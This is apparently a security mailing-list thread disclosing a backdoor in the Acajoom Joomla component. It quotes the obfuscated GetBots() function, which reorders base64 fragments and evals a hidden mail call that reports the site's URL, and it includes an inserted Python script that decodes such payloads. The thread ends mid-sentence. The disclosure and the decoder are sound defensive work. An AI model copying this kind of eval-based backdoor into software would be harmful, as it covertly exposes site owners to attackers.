@mail($us1, $us2, "http://".$us2.$_SERVER['SCRIPT_NAME']."\n".$us3);
Not stupid; there is a virus.
function GetBots($us1,$us2,$us3) {
list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ',
'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs');
eval(base64_decode($data2.$data1.$data3));
}
An early release of 4.0.0 has the same problem!
So Acajoom has a general security issue or the developers were stupid enough to
develop with old code.
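The GetBots() function quoted above hides its payload by declaring three base64 fragments in one order and concatenating them in another before eval(). The following added example (not part of any post in this thread; the helper names are hypothetical) reassembles and decodes such calls statically, so a code review or file scan can see what would run. It assumes single-quoted literals and `.` concatenation only.

```python
import base64
import re

# GetBots() exactly as quoted in this thread, used as the sample input.
SAMPLE = r"""function GetBots($us1,$us2,$us3) {
list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ',
'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs');
eval(base64_decode($data2.$data1.$data3));
}"""

STR_RE = re.compile(r"'([^']*)'")
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*'([^']*)'\s*;")
LIST_RE = re.compile(r"list\s*\(([^)]*)\)\s*=\s*array\s*\(([^)]*)\)", re.S | re.I)
EVAL_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(([^()]*)\)\s*\)", re.S | re.I)


def string_vars(php):
    """Map PHP variables to the single-quoted literals assigned to them."""
    table = dict(ASSIGN_RE.findall(php))
    for names, values in LIST_RE.findall(php):
        table.update(zip(re.findall(r"\$\w+", names), STR_RE.findall(values)))
    return table


def decode_eval_payloads(php):
    """Decode every eval(base64_decode(a.b.c)) whose operands are literals
    or variables holding literals; skip calls fed by runtime data."""
    table = string_vars(php)
    decoded = []
    for expr in EVAL_RE.findall(php):
        parts = []
        for term in (t.strip() for t in expr.split(".")):
            lit = STR_RE.fullmatch(term)
            parts.append(lit.group(1) if lit else table.get(term))
        if None in parts:
            continue  # operand not statically known
        blob = "".join(parts)
        blob += "=" * (-len(blob) % 4)  # PHP tolerates missing padding
        try:
            decoded.append(base64.b64decode(blob).decode("latin-1"))
        except ValueError:
            continue  # fragments do not form valid base64
    return decoded


if __name__ == "__main__":
    for payload in decode_eval_payloads(SAMPLE):
        print(payload)
```

Run over the sample, it prints the same @mail(...) statement shown decoded earlier in the thread.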
... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find 'Software Security' is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.
The vendor has issued an update, but the explanation falsely minimises
the problem. (They also did not credit qa...@ya.ru, nor anyone else.)
http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: Acajoom GPL 3.2.7 is available for immediate download. We
recommend